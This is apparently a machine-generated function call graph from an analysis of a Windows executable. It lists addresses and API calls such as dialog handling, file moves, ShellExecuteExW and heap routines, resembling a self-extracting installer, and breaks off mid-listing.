SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22934->22944 22936 2fe91a 22936->22921 22938 309a4d LoadLibraryExW 22937->22938 22941 309a42 22937->22941 22939 309a82 22938->22939 22940 309a6a GetLastError 22938->22940 22939->22941 22942 309a99 FreeLibrary 22939->22942 22940->22939 22943 309a75 LoadLibraryExW 22940->22943 22941->22927 22942->22941 22943->22939 22944->22936 24942 2f9fee GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 24854 30f4f4 IsProcessorFeaturePresent 24876 309df5 FreeLibrary 24855 3090fa 21 API calls 2 library calls 24943 2fa3e1 101 API calls 24877 3029e0 RtlUnwind 23003 2fbaf9 23005 2fbafe 23003->23005 23016 2fb51b _wcsrchr 23003->23016 23005->23016 23029 2fc431 23005->23029 23007 2fc0c4 23009 2fb808 SetWindowTextW 23009->23016 23014 2fb5f9 SetFileAttributesW 23017 2fb6b4 GetFileAttributesW 23014->23017 23027 2fb5ec ___scrt_get_show_window_mode 23014->23027 23016->23007 23016->23009 23016->23027 23052 2f1410 CompareStringW 23016->23052 23053 2f95f8 GetCurrentDirectoryW 23016->23053 23054 2ea215 7 API calls 23016->23054 23060 2ea19e FindClose 23016->23060 23061 2fa2ae 76 API calls ___std_exception_copy 23016->23061 23062 302b5e 23016->23062 23075 2fa156 ExpandEnvironmentStringsW 23016->23075 23019 2fb6c2 DeleteFileW 23017->23019 23017->23027 23019->23027 23021 2fb9d2 GetDlgItem SetWindowTextW SendMessageW 23021->23027 23023 2fba14 SendMessageW 23023->23016 23025 2fb708 MoveFileW 23026 2fb720 MoveFileExW 23025->23026 23025->23027 23026->23027 23027->23014 23027->23016 23027->23021 23027->23023 23028 2fb690 SHFileOperationW 23027->23028 23055 2eb1b7 52 API calls 2 library calls 23027->23055 23056 2e3e41 23027->23056 23059 2ea215 7 API calls 23027->23059 23028->23017 23031 2fc43b ___scrt_get_show_window_mode 23029->23031 23030 2fc693 23030->23016 23031->23030 23032 2fc526 23031->23032 23083 2f1410 CompareStringW 23031->23083 23076 2e9e6b 23032->23076 23036 2fc55a ShellExecuteExW 23036->23030 23038 2fc56d 23036->23038 23040 2fc5a8 WaitForInputIdle 23038->23040 23041 2fc597 IsWindowVisible 23038->23041 23042 2fc5fe CloseHandle 23038->23042 23039 2fc552 23039->23036 23079 2fc8f0 WaitForSingleObject 23040->23079 23041->23040 23043 2fc5a2 ShowWindow 23041->23043 23046 2fc60c 23042->23046 23047 2fc617 23042->23047 23043->23040 23085 2f1410 CompareStringW 23046->23085 23047->23030 23050 2fc68e ShowWindow 23047->23050 23049 2fc5d3 GetExitCodeProcess 23049->23042 23051 2fc5e6 23049->23051 23050->23030 23051->23042 23052->23016 23053->23016 23054->23016 23055->23027 23109 2e3e14 23056->23109 23059->23027 23060->23016 23061->23016 23063 307b78 23062->23063 23064 307b90 23063->23064 23065 307b85 23063->23065 23067 307b98 23064->23067 23074 307ba1 _abort 23064->23074 23181 307a8a 23065->23181 23068 307a50 _free 20 API calls 23067->23068 23071 307b8d 23068->23071 23069 307ba6 23188 307ecc 20 API calls _abort 23069->23188 23070 307bcb RtlReAllocateHeap 23070->23071 23070->23074 23071->23016 23074->23069 23074->23070 23189 306763 7 API calls 2 library calls 23074->23189 23075->23016 23086 2e9e7f 23076->23086 23080 2fc926 23079->23080 23081 2fc5c0 23080->23081 23082 2fc909 PeekMessageW WaitForSingleObject 23080->23082 23081->23042 23081->23049 23082->23080 23083->23032 23084 2eaed7 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23084->23039 23085->23047 23094 2fd940 23086->23094 23089 2e9e9d 23096 2eb32c 23089->23096 23090 2e9e74 23090->23036 23090->23084 23092 2e9eb1 23092->23090 23093 2e9eb5 GetFileAttributesW 23092->23093 23093->23090 23095 2e9e8c GetFileAttributesW 23094->23095 23095->23089 23095->23090 23097 2eb339 23096->23097 23105 2eb343 23097->23105 23106 2eb4c6 CharUpperW 23097->23106 23099 2eb352 23107 2eb4f2 CharUpperW 23099->23107 23101 2eb361 23102 2eb3dc GetCurrentDirectoryW 23101->23102 23103 2eb365 23101->23103 23102->23105 23108 2eb4c6 CharUpperW 23103->23108 23105->23092 23106->23099 23107->23101 23108->23105 23110 2e3e2b __vsnwprintf_l 23109->23110 23113 304cf4 23110->23113 23116 302db7 23113->23116 23117 302df7 23116->23117 23118 302ddf 23116->23118 23117->23118 23120 302dff 23117->23120 23133 307ecc 20 API calls _abort 23118->23133 23135 303356 23120->23135 23121 302de4 23134 307dab 26 API calls _abort 23121->23134 23125 2fe203 DloadUnlock 5 API calls 23127 2e3e35 GetFileAttributesW 23125->23127 23127->23025 23127->23027 23128 302e87 23144 303706 51 API calls 4 library calls 23128->23144 23131 302def 23131->23125 23132 302e92 23145 3033d9 20 API calls _free 23132->23145 23133->23121 23134->23131 23136 303373 23135->23136 23137 302e0f 23135->23137 23136->23137 23146 308516 GetLastError 23136->23146 23143 303321 20 API calls 2 library calls 23137->23143 23139 303394 23167 308665 38 API calls __cftof 23139->23167 23141 3033ad 23168 308692 38 API calls __cftof 23141->23168 23143->23128 23144->23132 23145->23131 23147 308538 23146->23147 23148 30852c 23146->23148 23170 307b1b 20 API calls 3 library calls 23147->23170 23169 309b53 11 API calls 2 library calls 23148->23169 23151 308532 23151->23147 23153 308581 SetLastError 23151->23153 23152 308544 23154 30854c 23152->23154 23177 309ba9 11 API calls 2 library calls 23152->23177 23153->23139 23171 307a50 23154->23171 23157 308561 23157->23154 23159 308568 23157->23159 23158 308552 23161 30858d SetLastError 23158->23161 23178 308388 20 API calls _abort 23159->23178 23179 307ad8 38 API calls _abort 23161->23179 23162 308573 23164 307a50 _free 20 API calls 23162->23164 23166 30857a 23164->23166 23166->23153 23166->23161 23167->23141 23168->23137 23169->23151 23170->23152 23172 307a84 __dosmaperr 23171->23172 23173 307a5b RtlFreeHeap 23171->23173 23172->23158 23173->23172 23174 307a70 23173->23174 23180 307ecc 20 API calls _abort 23174->23180 23176 307a76 GetLastError 23176->23172 23177->23157 23178->23162 23180->23176 23182 307ac8 23181->23182 23183 307a98 _abort 23181->23183 23191 307ecc 20 API calls _abort 23182->23191 23183->23182 23185 307ab3 RtlAllocateHeap 23183->23185 23190 306763 7 API calls 2 library calls 23183->23190 23185->23183 23186 307ac6 23185->23186 23186->23071 23188->23071 23189->23074 23190->23183 23191->23186 24878 2fe1f9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24912 2f86f9 GetClientRect 24879 3075d2 8 API calls ___vcrt_uninitialize 24944 2f93cd GdipDisposeImage GdipFree __except_handler4 24880 2fe1ca 28 API calls 2 library calls 24946 2f9fc9 78 API calls 24882 3025c0 5 API calls 2 library calls 24884 3091c2 71 API calls _free 23421 2fd7da 23422 2fd7e4 23421->23422 23423 2fd53a ___delayLoadHelper2@8 19 API calls 23422->23423 23424 2fd7f1 23423->23424 24947 2fdfd3 46 API calls 6 library calls 24007 2fa5d1 24008 2fa5db __EH_prolog 24007->24008 24170 2e12d7 24008->24170 24011 2fa61d 24015 2fa62a 24011->24015 24016 2fa693 24011->24016 24074 2fa609 24011->24074 24012 2facb2 24257 2fc343 24012->24257 24020 2fa62f 24015->24020 24153 2fa666 24015->24153 24019 2fa732 GetDlgItemTextW 24016->24019 24024 2fa6ad 24016->24024 24017 2facde 24021 2facf8 GetDlgItem SendMessageW 24017->24021 24022 2face7 SendDlgItemMessageW 24017->24022 24018 2facd0 SendMessageW 24018->24017 24023 2fa769 24019->24023 24019->24153 24029 2eda42 53 API calls 24020->24029 24020->24074 24275 2f95f8 GetCurrentDirectoryW 24021->24275 24022->24021 24027 2fa781 GetDlgItem 24023->24027 24168 2fa772 24023->24168 24028 2eda42 53 API calls 24024->24028 24026 2fa687 EndDialog 24026->24074 24032 2fa7bb SetFocus 24027->24032 24033 2fa795 SendMessageW SendMessageW 24027->24033 24034 2fa6cf SetDlgItemTextW 24028->24034 24030 2fa649 24029->24030 24295 2e1217 SHGetMalloc 24030->24295 24031 2fad2a GetDlgItem 24036 2fad49 SetWindowTextW 24031->24036 24037 2fad43 24031->24037 24038 2fa7cb 24032->24038 24049 2fa7d7 24032->24049 24033->24032 24039 2fa6dd 24034->24039 24276 2f9a32 GetClassNameW 24036->24276 24037->24036 24043 2eda42 53 API calls 24038->24043 24047 2fa6ea GetMessageW 24039->24047 24039->24074 24040 2fa650 24044 2fa654 SetDlgItemTextW 24040->24044 24040->24074 24041 2fac52 24045 2eda42 53 API calls 24041->24045 24048 2fa7d5 24043->24048 24044->24074 24050 2fac62 SetDlgItemTextW 24045->24050 24052 2fa701 IsDialogMessageW 24047->24052 24047->24074 24180 2fc190 24048->24180 24057 2eda42 53 API calls 24049->24057 24054 2fac76 24050->24054 24052->24039 24053 2fa710 TranslateMessage DispatchMessageW 24052->24053 24053->24039 24060 2eda42 53 API calls 24054->24060 24059 2fa809 24057->24059 24058 2fa82c 24190 2e9d3a 24058->24190 24064 2e3e41 _swprintf 51 API calls 24059->24064 24065 2fac9f 24060->24065 24061 2fad94 24063 2fadc4 24061->24063 24067 2eda42 53 API calls 24061->24067 24062 2fb4c7 99 API calls 24062->24061 24073 2fb4c7 99 API calls 24063->24073 24103 2fae7c 24063->24103 24064->24048 24068 2eda42 53 API calls 24065->24068 24072 2fada7 SetDlgItemTextW 24067->24072 24068->24074 24070 2fa868 24196 2f9a8d SetCurrentDirectoryW 24070->24196 24071 2fa861 GetLastError 24071->24070 24077 2eda42 53 API calls 24072->24077 24078 2faddf 24073->24078 24075 2faf2c 24079 2faf3e 24075->24079 24080 2faf35 EnableWindow 24075->24080 24083 2fadbb SetDlgItemTextW 24077->24083 24089 2fadf1 24078->24089 24104 2fae16 24078->24104 24081 2faf5b 24079->24081 24299 2e1294 GetDlgItem KiUserCallbackDispatcher 24079->24299 24080->24079 24086 2faf82 24081->24086 24094 2faf7a SendMessageW 24081->24094 24082 2fa87e 24087 2fa891 24082->24087 24088 2fa887 GetLastError 24082->24088 24083->24063 24085 2fae6f 24091 2fb4c7 99 API calls 24085->24091 24086->24074 24096 2eda42 53 API calls 24086->24096 24095 2fa90c 24087->24095 24098 2fa91c 24087->24098 24101 2fa8a9 GetTickCount 24087->24101 24088->24087 24297 2f8fe6 32 API calls 24089->24297 24090 2faf51 24300 2e1294 GetDlgItem KiUserCallbackDispatcher 24090->24300 24091->24103 24094->24086 24095->24098 24099 2fab55 24095->24099 24102 2faf9b SetDlgItemTextW 24096->24102 24097 2fae0a 24097->24104 24106 2fa934 GetModuleFileNameW 24098->24106 24107 2faaf0 24098->24107 24216 2e12b2 GetDlgItem ShowWindow 24099->24216 24100 2faf0a 24298 2f8fe6 32 API calls 24100->24298 24109 2e3e41 _swprintf 51 API calls 24101->24109 24102->24074 24103->24075 24103->24100 24110 2eda42 53 API calls 24103->24110 24104->24085 24111 2fb4c7 99 API calls 24104->24111 24205 2ee7aa 24106->24205 24119 2eda42 53 API calls 24107->24119 24107->24153 24115 2fa8c6 24109->24115 24110->24103 24116 2fae44 24111->24116 24112 2fab65 24217 2e12b2 GetDlgItem ShowWindow 24112->24217 24114 2faf29 24114->24075 24197 2e9528 24115->24197 24116->24085 24120 2fae4d DialogBoxParamW 24116->24120 24123 2fab04 24119->24123 24120->24085 24120->24153 24121 2fab6f 24125 2eda42 53 API calls 24121->24125 24122 2e3e41 _swprintf 51 API calls 24126 2fa980 CreateFileMappingW 24122->24126 24127 2e3e41 _swprintf 51 API calls 24123->24127 24129 2fab79 SetDlgItemTextW 24125->24129 24130 2faa5f __vswprintf_c_l 24126->24130 24131 2fa9e2 GetCommandLineW 24126->24131 24132 2fab22 24127->24132 24128 2fa8ec 24134 2fa8fa 24128->24134 24135 2fa8f3 GetLastError 24128->24135 24218 2e12b2 GetDlgItem ShowWindow 24129->24218 24137 2faa6a ShellExecuteExW 24130->24137 24133 2fa9f3 24131->24133 24141 2eda42 53 API calls 24132->24141 24209 2fa24e SHGetMalloc 24133->24209 24139 2e946e 79 API calls 24134->24139 24135->24134 24147 2faa87 24137->24147 24139->24095 24140 2fab8d SetDlgItemTextW GetDlgItem 24143 2fabbe 24140->24143 24144 2faba6 GetWindowLongW SetWindowLongW 24140->24144 24141->24153 24142 2faa0f 24210 2fa24e SHGetMalloc 24142->24210 24219 2fb4c7 24143->24219 24144->24143 24150 2faa9c WaitForInputIdle 24147->24150 24151 2faaca 24147->24151 24149 2faa1b 24211 2fa24e SHGetMalloc 24149->24211 24155 2faab1 24150->24155 24151->24107 24160 2faae0 UnmapViewOfFile CloseHandle 24151->24160 24152 2fb4c7 99 API calls 24156 2fabda 24152->24156 24153->24026 24153->24074 24155->24151 24158 2faab6 Sleep 24155->24158 24245 2fc6ff 24156->24245 24157 2faa27 24212 2ee90c 24157->24212 24158->24151 24158->24155 24160->24107 24163 2faa3e MapViewOfFile 24163->24130 24168->24041 24168->24153 24171 2e1339 24170->24171 24172 2e12e0 24170->24172 24302 2ed6e4 GetWindowLongW SetWindowLongW 24171->24302 24173 2e1346 24172->24173 24301 2ed70b 61 API calls 2 library calls 24172->24301 24173->24011 24173->24012 24173->24074 24176 2e1302 24176->24173 24177 2e1315 GetDlgItem 24176->24177 24177->24173 24178 2e1325 24177->24178 24178->24173 24179 2e132b SetWindowTextW 24178->24179 24179->24173 24181 2fa388 5 API calls 24180->24181 24182 2fc19c GetDlgItem 24181->24182 24183 2fc1f1 SendMessageW SendMessageW 24182->24183 24184 2fc1c1 24182->24184 24185 2fc229 24183->24185 24186 2fc248 SendMessageW SendMessageW SendMessageW 24183->24186 24189 2fc1cc ShowWindow SendMessageW SendMessageW 24184->24189 24185->24186 24187 2fc273 SendMessageW 24186->24187 24188 2fc292 SendMessageW 24186->24188 24187->24188 24188->24058 24189->24183 24193 2e9d44 24190->24193 24191 2e9dd5 24192 2e9ef2 9 API calls 24191->24192 24194 2e9dfe 24191->24194 24192->24194 24193->24191 24193->24194 24303 2e9ef2 24193->24303 24194->24070 24194->24071 24196->24082 24198 2e9532 24197->24198 24199 2e959c CreateFileW 24198->24199 24200 2e9590 24198->24200 24199->24200 24201 2e95ee 24200->24201 24202 2eb32c 2 API calls 24200->24202 24201->24128 24203 2e95d5 24202->24203 24203->24201 24204 2e95d9 CreateFileW 24203->24204 24204->24201 24206 2ee7b3 24205->24206 24208 2ee7cc 24205->24208 24324 2ee821 24206->24324 24208->24122 24209->24142 24210->24149 24211->24157 24213 2ee932 24212->24213 24214 2ee91b ___scrt_get_show_window_mode 24212->24214 24215 2ee821 80 API calls 24213->24215 24214->24163 24215->24214 24216->24112 24217->24121 24218->24140 24220 2fb4d1 __EH_prolog 24219->24220 24221 2fabcc 24220->24221 24346 2fa156 ExpandEnvironmentStringsW 24220->24346 24221->24152 24225 2fb808 SetWindowTextW 24232 2fb508 _wcsrchr 24225->24232 24228 302b5e 22 API calls 24228->24232 24230 2fb5f9 SetFileAttributesW 24233 2fb6b4 GetFileAttributesW 24230->24233 24243 2fb5ec ___scrt_get_show_window_mode 24230->24243 24232->24221 24232->24225 24232->24228 24232->24243 24347 2f1410 CompareStringW 24232->24347 24348 2f95f8 GetCurrentDirectoryW 24232->24348 24349 2ea215 7 API calls 24232->24349 24352 2ea19e FindClose 24232->24352 24353 2fa2ae 76 API calls ___std_exception_copy 24232->24353 24354 2fa156 ExpandEnvironmentStringsW 24232->24354 24235 2fb6c2 DeleteFileW 24233->24235 24233->24243 24235->24243 24237 2fb9d2 GetDlgItem SetWindowTextW SendMessageW 24237->24243 24238 2e3e41 _swprintf 51 API calls 24240 2fb6f7 GetFileAttributesW 24238->24240 24239 2fba14 SendMessageW 24239->24232 24241 2fb708 MoveFileW 24240->24241 24240->24243 24242 2fb720 MoveFileExW 24241->24242 24241->24243 24242->24243 24243->24230 24243->24232 24243->24237 24243->24238 24243->24239 24244 2fb690 SHFileOperationW 24243->24244 24350 2eb1b7 52 API calls 2 library calls 24243->24350 24351 2ea215 7 API calls 24243->24351 24244->24233 24246 2fc709 __EH_prolog 24245->24246 24355 2efb08 76 API calls 24246->24355 24248 2fc73a 24356 2e5a9f 76 API calls 24248->24356 24250 2fc758 24357 2e7adf 78 API calls 2 library calls 24250->24357 24252 2fc79c 24358 2e7c55 24252->24358 24254 2fc7ab 24367 2e7b71 84 API calls 24254->24367 24258 2fc350 24257->24258 24259 2f952a 6 API calls 24258->24259 24260 2fc355 24259->24260 24261 2fc35d GetWindow 24260->24261 24262 2facb8 24260->24262 24261->24262 24265 2fc379 24261->24265 24262->24017 24262->24018 24263 2fc386 GetClassNameW 24811 2f1410 CompareStringW 24263->24811 24265->24262 24265->24263 24266 2fc40f GetWindow 24265->24266 24267 2fc3ae GetWindowLongW 24265->24267 24266->24262 24266->24265 24267->24266 24268 2fc3be SendMessageW 24267->24268 24268->24266 24269 2fc3d4 GetObjectW 24268->24269 24812 2f958c GetDC GetDeviceCaps ReleaseDC 24269->24812 24271 2fc3e9 24813 2f9549 GetDC GetDeviceCaps ReleaseDC 24271->24813 24814 2f975d 8 API calls ___scrt_get_show_window_mode 24271->24814 24274 2fc3f9 SendMessageW DeleteObject 24274->24266 24275->24031 24277 2f9a78 24276->24277 24278 2f9a53 24276->24278 24282 2f9eef 24277->24282 24815 2f1410 CompareStringW 24278->24815 24280 2f9a66 24280->24277 24281 2f9a6a FindWindowExW 24280->24281 24281->24277 24283 2f9ef9 __EH_prolog 24282->24283 24284 2e137d 82 API calls 24283->24284 24285 2f9f1b 24284->24285 24816 2e1e9e 24285->24816 24288 2f9f35 24290 2e162d 84 API calls 24288->24290 24289 2f9f44 24291 2e192e 128 API calls 24289->24291 24294 2f9f40 24290->24294 24292 2f9f66 __vswprintf_c_l ___std_exception_copy 24291->24292 24293 2e162d 84 API calls 24292->24293 24293->24294 24294->24061 24294->24062 24295->24040 24297->24097 24298->24114 24299->24090 24300->24081 24301->24176 24302->24173 24304 2e9eff 24303->24304 24305 2e9f23 24304->24305 24306 2e9f16 CreateDirectoryW 24304->24306 24307 2e9e6b 4 API calls 24305->24307 24306->24305 24308 2e9f56 24306->24308 24309 2e9f29 24307->24309 24312 2e9f65 24308->24312 24316 2ea12f 24308->24316 24310 2e9f69 GetLastError 24309->24310 24313 2eb32c 2 API calls 24309->24313 24310->24312 24312->24193 24314 2e9f3f 24313->24314 24314->24310 24315 2e9f43 CreateDirectoryW 24314->24315 24315->24308 24315->24310 24317 2fd940 24316->24317 24318 2ea13c SetFileAttributesW 24317->24318 24319 2ea17f 24318->24319 24320 2ea152 24318->24320 24319->24312 24321 2eb32c 2 API calls 24320->24321 24322 2ea166 24321->24322 24322->24319 24323 2ea16a SetFileAttributesW 24322->24323 24323->24319 24325 2ee832 __vswprintf_c_l 24324->24325 24328 2ee862 24325->24328 24329 2ee86e 24328->24329 24330 2ee878 24328->24330 24338 2ee7e3 24329->24338 24332 2ee8e2 GetCurrentProcessId 24330->24332 24334 2ee898 24330->24334 24333 2ee85c 24332->24333 24333->24208 24334->24333 24344 2e6cce 74 API calls __vswprintf_c_l 24334->24344 24336 2ee8b3 __except_handler4 24345 2e6cc9 RaiseException Concurrency::cancel_current_task 24336->24345 24339 2ee7ec 24338->24339 24343 2ee81b 24338->24343 24340 2efcfd 2 API calls 24339->24340 24341 2ee7f6 24340->24341 24342 2ee7fc GetProcAddress GetProcAddress 24341->24342 24341->24343 24342->24343 24343->24330 24344->24336 24345->24333 24346->24232 24347->24232 24348->24232 24349->24232 24350->24243 24351->24243 24352->24232 24353->24232 24354->24232 24355->24248 24356->24250 24357->24252 24359 2e7c5f 24358->24359 24361 2e7cc9 24359->24361 24390 2ea1b1 24359->24390 24362 2e7d39 24361->24362 24366 2ea1b1 8 API calls 24361->24366 24368 2e81c4 24361->24368 24364 2e7d7b 24362->24364 24396 2e134c 74 API calls 24362->24396 24364->24254 24366->24361 24369 2e81ce __EH_prolog 24368->24369 24397 2e137d 24369->24397 24371 2e81e9 24405 2e9c0e 24371->24405 24377 2e8218 24528 2e162d 24377->24528 24378 2e8214 24378->24377 24386 2ea1b1 8 API calls 24378->24386 24389 2e82b3 24378->24389 24532 2eb782 CompareStringW 24378->24532 24382 2e8313 24431 2e1e4f 24382->24431 24386->24378 24387 2e831e 24387->24377 24435 2e391a 24387->24435 24445 2e83c0 24387->24445 24424 2e835c 24389->24424 24391 2ea1c6 24390->24391 24395 2ea1ca 24391->24395 24799 2ea2df 24391->24799 24393 2ea1da 24394 2ea1df FindClose 24393->24394 24393->24395 24394->24395 24395->24359 24396->24364 24398 2e1382 __EH_prolog 24397->24398 24533 2ec4ca 24398->24533 24400 2e13b9 24401 2fd82c new 8 API calls 24400->24401 24404 2e1412 ___scrt_get_show_window_mode 24400->24404 24402 2e13ff 24401->24402 24403 2ead1b 82 API calls 24402->24403 24402->24404 24403->24404 24404->24371 24406 2e9c19 24405->24406 24407 2e81ff 24406->24407 24539 2e6d9a 76 API calls 24406->24539 24407->24377 24409 2e1973 24407->24409 24410 2e197d __EH_prolog 24409->24410 24416 2e19c0 24410->24416 24417 2e19a5 24410->24417 24540 2e6ed7 24410->24540 24412 2e1ae3 24543 2e134c 74 API calls 24412->24543 24414 2e391a 98 API calls 24419 2e1b3a 24414->24419 24415 2e1af3 24415->24414 24415->24417 24416->24412 24416->24415 24416->24417 24417->24378 24418 2e1b7d 24418->24417 24423 2e1bac 24418->24423 24544 2e134c 74 API calls 24418->24544 24419->24418 24421 2e391a 98 API calls 24419->24421 24421->24419 24422 2e391a 98 API calls 24422->24423 24423->24417 24423->24422 24425 2e8369 24424->24425 24562 2f0878 GetSystemTime SystemTimeToFileTime 24425->24562 24427 2e82cd 24427->24382 24428 2f0fbd 24427->24428 24564 2fcafe 24428->24564 24432 2e1e54 __EH_prolog 24431->24432 24433 2e1e88 24432->24433 24572 2e192e 24432->24572 24433->24387 24436 2e392a 24435->24436 24437 2e3926 24435->24437 24438 2e3949 24436->24438 24439 2e3957 24436->24439 24437->24387 24440 2e3989 24438->24440 24738 2e30fc 86 API calls 3 library calls 24438->24738 24739 2e2692 98 API calls 3 library calls 24439->24739 24440->24387 24443 2e3955 24443->24440 24740 2e1ef8 74 API calls 24443->24740 24446 2e83ca __EH_prolog 24445->24446 24447 2e8403 24446->24447 24448 2e8407 24446->24448 24764 2f80d0 101 API calls 24446->24764 24447->24448 24449 2e842c 24447->24449 24454 2e84b5 24447->24454 24448->24387 24449->24448 24451 2e844e 24449->24451 24765 2e79a7 153 API calls 24449->24765 24451->24448 24766 2f80d0 101 API calls 24451->24766 24454->24448 24741 2e5c80 24454->24741 24456 2e8540 24456->24448 24749 2e80b1 24456->24749 24459 2e86a7 24460 2ea1b1 8 API calls 24459->24460 24462 2e8712 24459->24462 24460->24462 24461 2ec634 80 API calls 24472 2e876d _memcmp 24461->24472 24753 2e7be2 24462->24753 24464 2e889f 24465 2e8972 24464->24465 24473 2e88ee 24464->24473 24469 2e89cd 24465->24469 24483 2e897d 24465->24483 24466 2e8898 24769 2e6bf5 74 API calls 24466->24769 24480 2e895f 24469->24480 24772 2e7f5f 96 API calls 24469->24772 24470 2e8ff0 24475 2e946e 79 API calls 24470->24475 24471 2e89cb 24476 2e946e 79 API calls 24471->24476 24472->24448 24472->24461 24472->24464 24472->24466 24767 2e807d 83 API calls 24472->24767 24768 2e6bf5 74 API calls 24472->24768 24477 2e9e6b 4 API calls 24473->24477 24473->24480 24475->24448 24476->24448 24478 2e8926 24477->24478 24478->24480 24770 2e919c 96 API calls 24478->24770 24479 2e8a38 24479->24470 24482 2e9745 GetFileType 24479->24482 24492 2e8aa3 24479->24492 24480->24471 24480->24479 24481 2ea728 8 API calls 24484 2e8af2 24481->24484 24486 2e8a7b 24482->24486 24483->24471 24771 2e7d9b 100 API calls __except_handler4 24483->24771 24488 2ea728 8 API calls 24484->24488 24486->24492 24773 2e6bf5 74 API calls 24486->24773 24501 2e8b08 24488->24501 24490 2e8a91 24774 2e6e9b 75 API calls 24490->24774 24492->24481 24493 2e8d2c 24499 2e8d3e 24493->24499 24500 2e8d52 24493->24500 24516 2e8c56 24493->24516 24494 2e8c26 24496 2e8c98 24494->24496 24498 2e8c36 24494->24498 24495 2e8bcb 24495->24493 24495->24494 24497 2e80b1 CharUpperW 24496->24497 24502 2e8cb3 24497->24502 24503 2e8c7c 24498->24503 24509 2e8c44 24498->24509 24504 2e910b 123 API calls 24499->24504 24505 2f2842 75 API calls 24500->24505 24501->24495 24775 2e98d5 SetFilePointer GetLastError SetEndOfFile 24501->24775 24511 2e8cdc 24502->24511 24512 2e8ce3 24502->24512 24502->24516 24503->24516 24777 2e774c 108 API calls 24503->24777 24504->24516 24507 2e8d6b 24505->24507 24510 2f24d9 123 API calls 24507->24510 24776 2e6bf5 74 API calls 24509->24776 24510->24516 24778 2e74dd 84 API calls __except_handler4 24511->24778 24779 2e9049 94 API calls __EH_prolog 24512->24779 24518 2e8e7a 24516->24518 24780 2e6bf5 74 API calls 24516->24780 24518->24470 24519 2e8f33 24518->24519 24527 2e8f85 24518->24527 24781 2e9bd6 SetEndOfFile 24518->24781 24759 2e9a7e 24519->24759 24520 2ea12f 4 API calls 24523 2e8fe0 24520->24523 24523->24470 24782 2e6bf5 74 API calls 24523->24782 24524 2e8f7a 24526 2e94da 75 API calls 24524->24526 24526->24527 24527->24470 24527->24520 24529 2e163f 24528->24529 24798 2ec56d 84 API calls 24529->24798 24532->24378 24534 2ec4d4 __EH_prolog 24533->24534 24535 2fd82c new 8 API calls 24534->24535 24536 2ec517 24535->24536 24537 2fd82c new 8 API calls 24536->24537 24538 2ec53b 24537->24538 24538->24400 24539->24407 24545 2e16c0 24540->24545 24542 2e6ef3 24542->24416 24543->24417 24544->24423 24546 2e16d6 24545->24546 24557 2e172e __vswprintf_c_l 24545->24557 24547 2e16ff 24546->24547 24558 2e6cce 74 API calls __vswprintf_c_l 24546->24558 24548 2e1755 24547->24548 24554 2e171b ___std_exception_copy 24547->24554 24551 302b5e 22 API calls 24548->24551 24550 2e16f5 24559 2e6d3a 75 API calls 24550->24559 24553 2e175c 24551->24553 24553->24557 24561 2e6d3a 75 API calls 24553->24561 24554->24557 24560 2e6d3a 75 API calls 24554->24560 24557->24542 24558->24550 24559->24547 24560->24557 24561->24557 24563 2f08a8 __vswprintf_c_l 24562->24563 24563->24427 24565 2fcb0b 24564->24565 24566 2eda42 53 API calls 24565->24566 24567 2fcb2e 24566->24567 24568 2e3e41 _swprintf 51 API calls 24567->24568 24569 2fcb40 24568->24569 24570 2fc190 16 API calls 24569->24570 24571 2f0fd6 24570->24571 24571->24382 24573 2e1943 24572->24573 24575 2e193f 24572->24575 24576 2e1884 24573->24576 24575->24433 24577 2e1892 24576->24577 24579 2e18c7 24576->24579 24578 2e391a 98 API calls 24577->24578 24581 2e18aa 24578->24581 24584 2e3d4f 24579->24584 24581->24575 24588 2e3d58 24584->24588 24585 2e391a 98 API calls 24585->24588 24586 2e18e3 24586->24581 24589 2e1d61 24586->24589 24588->24585 24588->24586 24601 2f02e8 24588->24601 24590 2e1d6b __EH_prolog 24589->24590 24609 2e399d 24590->24609 24592 2e1d95 24593 2e1e1c 24592->24593 24594 2e16c0 76 API calls 24592->24594 24593->24581 24595 2e1dac 24594->24595 24637 2e1837 76 API calls 24595->24637 24597 2e1dc4 24599 2e1dd0 24597->24599 24638 2f0fde MultiByteToWideChar 24597->24638 24639 2e1837 76 API calls 24599->24639 24602 2f02ef 24601->24602 24604 2f030a 24602->24604 24607 2e6cc9 RaiseException Concurrency::cancel_current_task 24602->24607 24603 2f031b SetThreadExecutionState 24603->24588 24604->24603 24608 2e6cc9 RaiseException Concurrency::cancel_current_task 24604->24608 24607->24604 24608->24603 24610 2e39a7 __EH_prolog 24609->24610 24611 2e39bd 24610->24611 24612 2e39d9 24610->24612 24674 2e134c 74 API calls 24611->24674 24613 2e3c22 24612->24613 24617 2e3a05 24612->24617 24693 2e134c 74 API calls 24613->24693 24616 2e39c8 24616->24592 24617->24616 24640 2f2842 24617->24640 24619 2e3a86 24620 2e3b11 24619->24620 24636 2e3a7d 24619->24636 24677 2ec634 24619->24677 24653 2ea728 24620->24653 24621 2e3a82 24621->24619 24676 2e1ede 76 API calls 24621->24676 24623 2e3a54 24623->24619 24623->24621 24624 2e3a72 24623->24624 24675 2e134c 74 API calls 24624->24675 24629 2e3b24 24630 2e3b9e 24629->24630 24631 2e3ba8 24629->24631 24657 2e910b 24630->24657 24683 2f24d9 24631->24683 24634 2e3ba6 24634->24636 24692 2e6bf5 74 API calls 24634->24692 24668 2f16cb 24636->24668 24637->24597 24638->24599 24639->24593 24641 2f2851 24640->24641 24643 2f285b 24640->24643 24694 2e6d3a 75 API calls 24641->24694 24644 2f289b 24643->24644 24645 2f28a0 ___std_exception_copy 24643->24645 24652 2f28f9 ___scrt_get_show_window_mode 24643->24652 24696 300b4a RaiseException 24644->24696 24646 2f29b0 24645->24646 24648 2f28d5 24645->24648 24645->24652 24697 300b4a RaiseException 24646->24697 24695 2f2763 75 API calls 3 library calls 24648->24695 24650 2f29d3 24652->24623 24654 2ea735 24653->24654 24656 2ea73f 24653->24656 24655 2fd82c new 8 API calls 24654->24655 24655->24656 24656->24629 24658 2e9115 __EH_prolog 24657->24658 24698 2e7c3c 24658->24698 24661 2e6ed7 76 API calls 24662 2e9127 24661->24662 24701 2ec70f 24662->24701 24664 2e9139 24665 2e9181 24664->24665 24667 2ec70f 116 API calls 24664->24667 24710 2ec8c7 97 API calls __vswprintf_c_l 24664->24710 24665->24634 24667->24664 24669 2f16d5 24668->24669 24670 2f16ee 24669->24670 24673 2f1702 24669->24673 24711 2f03c7 84 API calls 24670->24711 24672 2f16f5 